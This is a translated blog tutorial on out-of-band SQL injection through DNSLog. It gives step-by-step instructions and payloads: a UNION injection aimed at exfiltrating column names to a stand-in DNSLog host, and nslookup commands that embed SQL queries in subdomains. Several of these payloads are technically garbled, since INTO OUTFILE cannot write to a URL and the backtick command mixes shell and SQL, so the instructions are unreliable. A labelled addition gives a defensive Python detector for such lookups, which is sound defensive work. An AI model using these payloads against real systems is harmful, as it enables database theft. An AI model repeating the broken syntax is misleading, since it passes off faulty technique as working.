Using DNSLog for No-Echo Injection

DNSLog concept

DNSLog (Domain Name System Log) is a technique and service for capturing and logging the requests and responses made through the Domain Name System (DNS) protocol. Its purpose is to help users track, analyze and manage DNS traffic and collect information related to domain names.

Basically, a DNSLog service provides a custom DNS server that keeps requests in a log and generates a unique domain name for each request. When a client (such as a web browser or an application) sends a DNS request, the server records the request and then generates a response containing some information about the original request. This information may include IP addresses, user agent strings, timestamps and other relevant data.

The principle of DNSLog no-echo injection

No-echo injection is an injection method that obtains the injection result through DNSLog when the injection point cannot directly return it in the response. The principle is to use the injection result as part of a DNS request, and then to obtain the result from what DNSLog records for that DNS request.

Steps to implement no-echo injection using DNSLog

  1. Construct injection payload: According to the injection point of the target application, construct the injection payload used to trigger the DNS request. For example, in the case of SQL injection attacks, the following payload can be used:

    ' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
    

    This payload will trigger a DNS request to send the column name information from the target application to the DNSLog service.

  2. Insert the payload: Insert the payload at the injection point of the target application. The exact method depends on the structure and vulnerability points of the target application. Typically, the injection point is in an application's input field.

  3. Trigger injection: Submit a request carrying the injection payload to the application to trigger the injection.

  4. Check DNSLog service: Visit the DNSLog service of your choice to check if DNS requests are received. If the injection is successfully triggered, you will be able to see the corresponding request recorded on the DNSLog service.

An example

Use DNSLog to get database table information

Injection point: Find the injection point in the target application and construct the injection statement.

    SELECT table_name FROM information_schema.tables WHERE table_schema=database()

Send the injection statement to the DNSLog server as part of the DNS request.

    nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com

View the response of the DNS request on the DNSLog server to obtain the injection result.

    nslookup -type=txt SELECT.*.example.com
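
Seen from the defender's side, the lookups described above show up in resolver logs as many distinct, data-like subdomains under one external zone, often requested by a database host. The following is an added example, not part of the original post, that flags this pattern in a constructed log; the log format, DB_HOSTS, ALLOWED_ZONES, the thresholds and all domain names are assumptions.

```python
import math
from collections import defaultdict

# Constructed resolver log: "<timestamp> <client-ip> <qtype> <qname>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.org
2024-05-01T10:00:02Z 10.0.0.5 A cdn.example.org
2024-05-01T10:00:03Z 10.0.0.9 A 7573657273.k3f9.collector.test
2024-05-01T10:00:04Z 10.0.0.9 A 6f7264657273.k3f9.collector.test
2024-05-01T10:00:05Z 10.0.0.9 A 7061796d656e7473.k3f9.collector.test
2024-05-01T10:00:06Z 10.0.0.9 A repo.internal.test
"""

DB_HOSTS = {"10.0.0.9"}             # assumption: known database servers
ALLOWED_ZONES = {"internal.test"}   # assumption: zones DB hosts may resolve


def entropy(label):
    """Shannon entropy in bits per character of one DNS label."""
    counts = {c: label.count(c) for c in set(label)}
    return -sum(n / len(label) * math.log2(n / len(label)) for n in counts.values())


def parent_zone(qname):
    """Naive parent zone: last two labels (a real tool would use the public suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def find_suspects(log_text, min_unique=3, min_entropy=2.5):
    """Return {(client, zone): sorted unique subdomains} for DNSLog-like lookup patterns."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                      # skip malformed lines
        _, client, _, qname = parts
        zone = parent_zone(qname)
        sub = qname.rstrip(".").lower()[: -len(zone)].rstrip(".")
        if sub:
            seen[(client, zone)].add(sub)
    suspects = {}
    for (client, zone), subs in seen.items():
        from_db = client in DB_HOSTS and zone not in ALLOWED_ZONES
        data_like = max(entropy(s.split(".")[0]) for s in subs) >= min_entropy
        if from_db or (len(subs) >= min_unique and data_like):
            suspects[(client, zone)] = sorted(subs)
    return suspects
```

Two independent signals are used: any lookup from a listed database host to a zone outside its allowlist, and, for any client, several unique high-entropy subdomains under the same zone.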

For more detail, see this expert's article:

SQL injection dnslog injection – ngin0x's blog

Origin: blog.csdn.net/qq_56698744/article/details/131779901